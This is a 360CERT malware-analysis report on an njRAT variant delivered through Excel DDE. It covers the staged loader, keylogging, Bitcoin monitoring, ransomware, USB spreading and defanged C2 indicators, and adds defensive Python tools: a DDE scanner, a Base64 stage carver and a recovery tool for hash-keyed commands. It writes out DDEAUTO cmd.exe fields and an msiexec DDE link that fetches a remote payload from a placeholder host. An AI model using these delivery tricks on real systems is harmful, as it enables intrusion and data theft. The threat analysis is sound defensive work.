Report number: B6-2018-062601
Report source: 360CERT
Report author: 360CERT
Update date: 2018-06-26
x00 Preface
Recently, 360CERT observed new variants of the njRAT malware family in the wild. The family is written on the .NET Framework, and the samples discussed in this report are heavily obfuscated to hinder analysis.
njRAT, also known as Bladabindi, is a plugin-based remote access Trojan (RAT). Because it is simple to build and operate, the barrier to using it is low. From this group's malicious use of it we summarize the following characteristics:
- malicious payloads stored with layer-by-layer encryption
- a decryption process controlled by the attacker
- code obfuscation that strongly resists reverse engineering
- global encrypted storage of strings
- ransomware capability (new)
- cryptocurrency theft (new)
In addition, during subsequent tracking and correlation we found that this group's historical activity relied on high-interaction social engineering and phishing e-mails to spread malware, targeting banks, tax authorities and similar institutions. The samples captured this time rely more on vulnerabilities and low-interaction attack techniques to deliver the payload than before.
x01 Technical Analysis
DDE (Dynamic Data Exchange) is a legacy inter-process communication (IPC) mechanism in Windows that dates back to 1987. It lets a document establish a dynamic data exchange link with other Windows programs. Besides exploits and macros, DDE is a commonly used payload delivery method in Office-based attacks.
The common DDE attack technique is to embed a DDEAUTO field, for example:
{DDEAUTO c:\windows\system32\cmd.exe "/k calc.exe"}
Combined with PowerShell, this can download remote payloads, decode and drop malicious code, execute remote commands, and so on. Because of this danger, Microsoft released an Office update in December 2017 (ADV170021) that disables DDE by default.
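A DDEAUTO field like the one above is stored inside the document's XML parts, so a triage script can find it without opening the file in Office. The following scanner is an added example, not code from the 360CERT report: it walks the OOXML container, joins Word field-code runs before searching (lures often split "DDE" and "AUTO" across runs to defeat a literal match), and reads Excel's ddeLink elements. The xlsx/docx containers it builds are constructed for the demo, with a placeholder URL, and are not the report's sample.

```python
"""Triage scan of an Office Open XML (docx/xlsx) file for DDE fields and links.

Added example, not code from the 360CERT report. The containers built below
are constructed for this demo; the URL is a placeholder.
"""
import html
import io
import re
import zipfile

# Word keeps field codes in <w:instrText> runs (often split across several runs)
# or in w:fldSimple/@w:instr; Excel keeps DDE links in xl/externalLinks/*.xml.
WORD_INSTR_RE = re.compile(r"<w:instrText\b[^>]*>(.*?)</w:instrText>", re.S)
WORD_SIMPLE_RE = re.compile(r'<w:fldSimple\b[^>]*\bw:instr="([^"]*)"', re.S)
EXCEL_DDE_RE = re.compile(r"<ddeLink\b[^>]*>", re.S)
DDE_KEYWORD_RE = re.compile(r"\bDDE(AUTO)?\b", re.I)


def _attr(tag: str, name: str) -> str:
    m = re.search(r'\b%s="([^"]*)"' % re.escape(name), tag)
    return html.unescape(m.group(1)) if m else ""


def scan_ooxml(data: bytes) -> list:
    """Return a list of {part, kind, detail} findings; an empty list means no DDE seen."""
    findings = []
    with zipfile.ZipFile(io.BytesIO(data)) as zf:
        for name in zf.namelist():
            if not name.lower().endswith(".xml"):
                continue
            text = zf.read(name).decode("utf-8", errors="replace")
            # Join every instrText run in the part before searching, so a field
            # code split as "DDE" + "AUTO ..." is still recognised.
            field_code = html.unescape("".join(WORD_INSTR_RE.findall(text)))
            if DDE_KEYWORD_RE.search(field_code):
                findings.append({"part": name, "kind": "word-field", "detail": field_code.strip()})
            for instr in WORD_SIMPLE_RE.findall(text):
                if DDE_KEYWORD_RE.search(instr):
                    findings.append({"part": name, "kind": "word-fldSimple", "detail": html.unescape(instr)})
            for tag in EXCEL_DDE_RE.findall(text):
                detail = (_attr(tag, "ddeService") + " " + _attr(tag, "ddeTopic")).strip()
                findings.append({"part": name, "kind": "excel-ddeLink", "detail": detail})
    return findings


def _zip(parts: dict) -> bytes:
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w", zipfile.ZIP_DEFLATED) as zf:
        for name, body in parts.items():
            zf.writestr(name, body)
    return buf.getvalue()


def build_sample_xlsx() -> bytes:
    """Constructed xlsx-like container whose external link launches msiexec."""
    return _zip({
        "[Content_Types].xml": "<Types/>",
        "xl/workbook.xml": "<workbook/>",
        "xl/externalLinks/externalLink1.xml":
            '<externalLink><ddeLink ddeService="msiexec" '
            'ddeTopic="/i http://example.invalid/mome.msi /q">'
            '<ddeItems><ddeItem name="x"/></ddeItems></ddeLink></externalLink>',
    })


def build_sample_docx(split_field: bool = True) -> bytes:
    """Constructed docx-like container with a DDEAUTO field; with split_field the
    code is spread over two instrText runs, as evasive lures do."""
    runs = (['<w:instrText xml:space="preserve">DDE</w:instrText>',
             '<w:instrText>AUTO c:\\windows\\system32\\cmd.exe "/k calc.exe"</w:instrText>']
            if split_field else
            ['<w:instrText>DDEAUTO c:\\windows\\system32\\cmd.exe "/k calc.exe"</w:instrText>'])
    body = "".join("<w:r>%s</w:r>" % r for r in runs)
    return _zip({
        "[Content_Types].xml": "<Types/>",
        "word/document.xml":
            '<w:document><w:body><w:p><w:r><w:fldChar w:fldCharType="begin"/></w:r>'
            + body + '<w:r><w:fldChar w:fldCharType="end"/></w:r></w:p></w:body></w:document>',
    })


def build_clean_docx() -> bytes:
    """Constructed docx-like container with an ordinary DATE field and no DDE."""
    return _zip({
        "[Content_Types].xml": "<Types/>",
        "word/document.xml":
            '<w:document><w:body><w:p><w:r><w:instrText>DATE \\@ "yyyy"</w:instrText>'
            '</w:r></w:p></w:body></w:document>',
    })


if __name__ == "__main__":
    for label, blob in (("xlsx", build_sample_xlsx()), ("docx", build_sample_docx()),
                        ("clean", build_clean_docx())):
        print(label, scan_ooxml(blob))
```

This is a first-pass check, not a full OOXML parser: it also catches fields in headers and footers because every XML part is scanned, but it will not see DDE hidden behind QUOTE-field tricks or inside embedded objects. Legitimate DDE links to other Office documents do exist, so treat a hit as something to review, and note that the older binary .xls/.doc formats need a different parser.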
This sample is an Excel file that, through the DDE protocol, prompts the user to update links and then uses msiexec to download and run the malicious payload. The first file executed is memo.msi. It drops the next stage in the temporary directory; that stage contains Base64-encoded C# code which is decoded, turned into an assembly at runtime, and loaded and executed via Invoke(). Once running, it drops yet another payload and executes it. After these two drop stages the malware body itself starts. The release process is as follows:
1. Execute via DDE, download the malicious payload to "C:\Users\ADMINI~1\AppData\Local\Temp\mome.msi" and run it.
2. Drop the next stage in the temporary directory.
3. Decode the Base64-encoded C# code and turn it into an assembly at runtime; the assembly then decrypts data from its own resources and loads the next stage.
4. Read the resources of its own file and decrypt them with a custom algorithm to obtain Stub.exe (the malware body) and adderalldll.dll (the injection DLL).
5. Add a startup item and, by loading adderalldll.dll, inject Stub.exe into RegAsm.exe (the puppet process).
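The chain above carries a stage as Base64 text that only becomes an assembly at runtime. A quick way to get at the next layer without running it is to carve every Base64 run out of the dropped stage and sniff what it decodes to. The script below is an added example, not code from the 360CERT report or the sample: the loader text, the tiny C# source and the fake managed-PE header it embeds are all constructed for the demo, and the "mscoree" check is a cheap heuristic for a .NET PE rather than a full PE parse.

```python
"""Carve Base64-encoded stages out of a dropped loader and classify them.

Added example, not code from the 360CERT report. The loader text and the
embedded stages below are constructed for the demo.
"""
import base64
import binascii
import re

B64_RUN_RE = re.compile(r"[A-Za-z0-9+/]{64,}={0,2}")
MIN_DECODED = 32  # shorter decodes are usually identifiers, not payloads


def classify(blob: bytes) -> str:
    """Cheap content sniff on a decoded stage."""
    if blob[:2] == b"MZ":
        # A managed PE's loader stub imports mscoree.dll; a native PE normally does not.
        return "dotnet-pe" if b"mscoree" in blob.lower() else "pe"
    text = blob.decode("utf-8", errors="ignore")
    if re.search(r"\busing\s+System\b", text) and re.search(r"\b(class|namespace)\b", text):
        return "csharp-source"
    if B64_RUN_RE.search(text):
        return "base64-nested"  # yet another encoded layer inside
    return "unknown"


def carve_stages(loader_text: str) -> list:
    """Return every Base64 run in loader_text that decodes cleanly, as
    {offset, size, kind, data}, in order of appearance."""
    stages = []
    for m in B64_RUN_RE.finditer(loader_text):
        try:
            blob = base64.b64decode(m.group(0), validate=True)
        except (binascii.Error, ValueError):
            continue  # not valid Base64 (bad padding etc.): skip it, do not crash
        if len(blob) < MIN_DECODED:
            continue
        stages.append({"offset": m.start(), "size": len(blob),
                       "kind": classify(blob), "data": blob})
    return stages


# Constructed stage contents: a tiny C# source and a fake managed-PE header.
CSHARP_SRC = 'using System;\nclass Stage2 { static void Main() { Console.WriteLine("next"); } }\n'
FAKE_PE = b"MZ" + b"\x00" * 60 + b"PE\x00\x00" + b"mscoree.dll\x00" + b"\x00" * 40

# Constructed loader text embedding both stages (shape only; not the sample's loader).
LOADER_TEXT = (
    "$src = [Convert]::FromBase64String('" + base64.b64encode(CSHARP_SRC.encode()).decode() + "')\n"
    "$bin = '" + base64.b64encode(FAKE_PE).decode() + "'\n"
    "Write-Host 'loader done'\n"
)


if __name__ == "__main__":
    for s in carve_stages(LOADER_TEXT):
        print(s["offset"], s["size"], s["kind"])
```

Each carved stage can be written to disk and fed to the next step (a .NET decompiler for the assembly, a source review for the C# text). The size floor and the strict decoder keep variable names and other alphanumeric runs out of the results; a stage that is additionally XOR- or AES-wrapped, as the report says this sample's resources are, will come back as "unknown" and needs the sample's own decryption routine.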
Sample flow chart:
Sample release:
Virus execution:
- Main function overview
- Scheduled task creation and deletion
- Host information collection
- Registry operations
- USB device infection
- Keystroke logging
- Current window title capture
- Running process enumeration
- Anti-virus and runtime-environment detection
- Bitcoin activity monitoring
- Ransomware
- DDoS (Slowloris and ARME)
- Send data to the remote C2
- Receive C2 commands and perform the specified operations
C2 commands
Technical details
The sample belongs to the njRAT family and is written in C#. Once the target is infected, the sample copies itself to the host to persist (it initially runs only in memory) and adds a scheduled task so that it survives reboots.
The sample is obfuscated, and the parameters and fields of key sections are encrypted, so these must be decrypted first. After decryption, the memory at the relevant location looks like this:
A script can be written to look up individual fields, or to decrypt them in batches.
When the sample runs, it starts the following main threads depending on its state:
- MyAntiProcess (anti-virus detection)
- Bitgrb (Bitcoin application monitoring)
- CHuNbRc6NBDgA1N5fN.RLSH5Jqs2M.WRK (keystroke and window title logging)
- CHuNbRc6NBDgA1N5fN.C6yF5G7kY (data exfiltration and C2 command handling)
MyAntiProcess performs anti-virus, anti-sandbox and anti-debugging checks; if certain processes are detected, it attempts to terminate them.
Bitgrb
Once the Bitgrb thread starts, it scans running processes and watches for any whose name contains the string BITCOIN, tracking cryptocurrency wallets while the victim buys or sells bitcoin. It also performs operations on the clipboard contents.
CHuNbRc6NBDgA1N5fN.RLSH5Jqs2M.WRK
This thread records keystrokes and window titles, 20,480 bytes at a time, and writes the captured keystrokes to the registry for later exfiltration.
CHuNbRc6NBDgA1N5fN.C6yF5G7kY
C6yF5G7kY has three parts. The first loops sending host information, which includes:
- System name
- Username
- Windows version (64-bit/32-bit)
- webcam (yes/no)
- active window title
- CPU
- GPU
- Memory
- Disk
- Infection time
The second part receives C2 commands and performs the corresponding operations. A C2 command is split on a delimiter, and the hash of the first field is used to select the handler.
The third part provides a Socket.Send wrapper for sending information to the C2. The function is named ISqOs4Ltj; passing it a string sends that string to the C2.
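Keying the dispatcher on a hash of the command name means the obfuscated binary contains only integer constants, never the command strings; the analyst recovers the table by running the sample's hash routine over a wordlist. The code below is an added example, not code from the 360CERT report or the njRAT sample: the report does not name the delimiter or the hash, so the '|' delimiter and 32-bit FNV-1a used here are stand-ins, and the handler table is constructed from the three ransomware command names the report does list.

```python
"""Hash-keyed C2 command dispatch, and recovering the command names from it.

Added example, not code from the 360CERT report or the njRAT sample. The
'|' delimiter and the FNV-1a hash are assumptions standing in for whatever
the sample really uses.
"""
from typing import Callable, Dict, Iterable, List, Optional, Tuple

DELIM = "|"  # assumed delimiter


def fnv1a32(text: str) -> int:
    """32-bit FNV-1a over the UTF-8 bytes of text (stand-in for the sample's hash)."""
    h = 0x811C9DC5
    for b in text.encode("utf-8"):
        h ^= b
        h = (h * 0x01000193) & 0xFFFFFFFF
    return h


def parse_command(raw: str) -> Tuple[int, List[str]]:
    """Split a raw C2 line: hash of the first field, remaining fields as arguments."""
    fields = raw.split(DELIM)
    return fnv1a32(fields[0]), fields[1:]


def dispatch(raw: str, handlers: Dict[int, Callable[[List[str]], str]]) -> str:
    """Route a command by hash. An unknown hash is reported, never executed: a
    truncated or corrupted line must not fall through to some other handler."""
    key, args = parse_command(raw)
    handler = handlers.get(key)
    if handler is None:
        return "unknown:0x%08x" % key
    return handler(args)


def recover_names(hashes: Iterable[int], wordlist: Iterable[str],
                  hashfn: Callable[[str], int] = fnv1a32) -> Dict[int, Optional[str]]:
    """Analyst side: hash a candidate wordlist and map each constant pulled from
    the dispatcher back to a name; constants with no candidate map to None."""
    table = {hashfn(w): w for w in wordlist}
    return {h: table.get(h) for h in hashes}


# Constructed dispatcher. In the obfuscated sample only the integer constants are
# visible; the names here are the ransomware commands listed in the report.
HANDLERS: Dict[int, Callable[[List[str]], str]] = {
    fnv1a32("Rware"): lambda a: "encrypt:" + ",".join(a),
    fnv1a32("RwareDEC"): lambda a: "decrypt:" + ",".join(a),
    fnv1a32("RwareSU"): lambda a: "ransom-status",
}

if __name__ == "__main__":
    print(dispatch("Rware|C:\\Users|D:\\", HANDLERS))
    print(dispatch("bogus|x", HANDLERS))
    # Wordlist: the report's commands plus hypothetical extra candidates.
    print(recover_names(HANDLERS, ["Rware", "RwareSU", "kl", "proc"]))
```

In practice the hash routine is lifted from the decompiled .NET code rather than guessed, and the wordlist comes from command names documented for earlier njRAT builds plus strings seen on the wire; any constant that stays unresolved is a handler worth reading by hand. Because the table is keyed by a short hash, collisions between candidate names are possible, so a recovered mapping should be confirmed against the handler's behaviour.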
Information about C2:
Hostname: apache202[.]duckdns[.]org
port: 7752
The C2 information is located at:
TCP connection:
Commands are executed in one of two ways: via Interaction.Shell, or by starting a new thread with Thread.Start().
Ransomware
The main ransomware commands are RwareDEC, RwareSU and Rware.
Rware is the encryption module. It encrypts files with AES and uses the .lime extension for the files it handles.
A random character array is generated here, and the resulting string is stored at %AppData%\Microsoft\MMC\hash.
The ransom message is then displayed on screen:
USB drive infection
The sample infects USB drives. It first enumerates the drive letters present on the host, then copies its file to each enumerated letter plus the next one up. If only drives C and D exist, the target list becomes C, D and E. Because a newly inserted USB drive takes the next free letter, this achieves propagation to removable media.
UAC bypass
The sample contains a privilege-escalation step that bypasses UAC through registry hijacking.
x02 Sample association analysis
Top-level domain: this is a dynamic DNS domain, and the registrant of the parent domain has no connection to this event.
Pivoting on the C2 IP 185[.]208[.]211[.]142, we found:
Historical resolutions:
secureserver202[.]duckdns[.]org
We found a sample in the Hybrid Analysis sandbox associated with this domain:
https://www.hybrid-analysis.com/sample/9a76ac2c893154592a09a179e5af2c86c8871265d009014bfb5ab25fabdb448a?environmentId=120
According to the sandbox report, this sample's functionality is similar to that of the sample described in this report, but it connects to two servers, 181[.]215[.]247[.]31 and 185[.]208[.]211[.]142, and unlike our sample its C2 port is 25255.
For the IP 181[.]215[.]247[.]31 we retrieved historical correlation data from the 360 Threat Intelligence Center:
From this data we learned that the group also uses the domain sanddeeprecruit[.]duckdns[.]org
Its A record currently resolves to 91[.]192[.]100[.]26
According to VirusTotal, the group's samples have been active since at least February 24.
The services exposed by the three machines are nearly identical, as if cloned, but the C2 ports obtained from the samples (2404, 25255, 7752, 1933) are all now closed.
notis[.]publicvm[.]com
Under this domain we found two related samples:
8cabb48e50d72bcc315bc53a5ab62907dae22f68d08c78a5e7ed42270080d4d1
21e16f82275a9c168f0ce0d5c817cdbbc5d6d7764bb2e2ab8b63dff70f972600
We also found the analysis report published by Proofpoint on March 23 this year: https://www.proofpoint.com/us/threat-insight/post/tax-themed-email-campaigns-steal-credentials-spread-banking-trojans-rats-ransomware
That report describes tax-themed e-mail campaigns spreading banking Trojans, RATs and ransomware, with tradecraft similar to the sample described here.
anotiz[.]erlivia[.]ltd
The domain currently resolves to 198[.]54[.]117[.]200
Through threat intelligence we know:
This group has likely used, or is still using, this server to spread malicious payloads by e-mail.
Combining these relationships, we summarize them in the following graph:
Data source for the graph above: 360NetLab
x03 IOC
x04 Summary:
njRAT is simple and easy to learn; a web search turns up many articles on configuring it or making it evade anti-virus. Its capabilities fully meet the needs of criminals, so this family has been very active on the Internet in recent years. From this analysis we summarize the following points:
1. Ransomware
2. Cryptocurrency theft
3. Keystroke logging
4. Automatic infection of USB devices
5. Anti-virus detection and anti-debugging
6. Remote control
7. Host hijacking
8. Encryption and obfuscation of malicious payloads
9. String encryption
10. Code obfuscation
11. Injection into a puppet process
During analysis we found that the sample runs inside a puppet process and has compatibility problems once injection completes, so it may only execute successfully in a specific environment. We therefore infer that this is a targeted attack rather than a large-scale campaign. Tracing the source, we learned that the group has been active since at least February 24 this year, and its servers are still online. According to data from 360 Security Brain, no Chinese computers have been observed to be attacked by this group.
x05 Security suggestions
1. Do not open documents sent by strangers through e-mail or chat software.
2. Download and install 360 Security Guard, keep all protections enabled, and check for software updates regularly.
x06 Timeline
2018-06-26 360CERT completed the analysis report
x07 Reference link
- https://www.proofpoint.com/us/threat-insight/post/tax-themed-email-campaigns-steal-credentials-spread-banking-trojans-rats-ransomware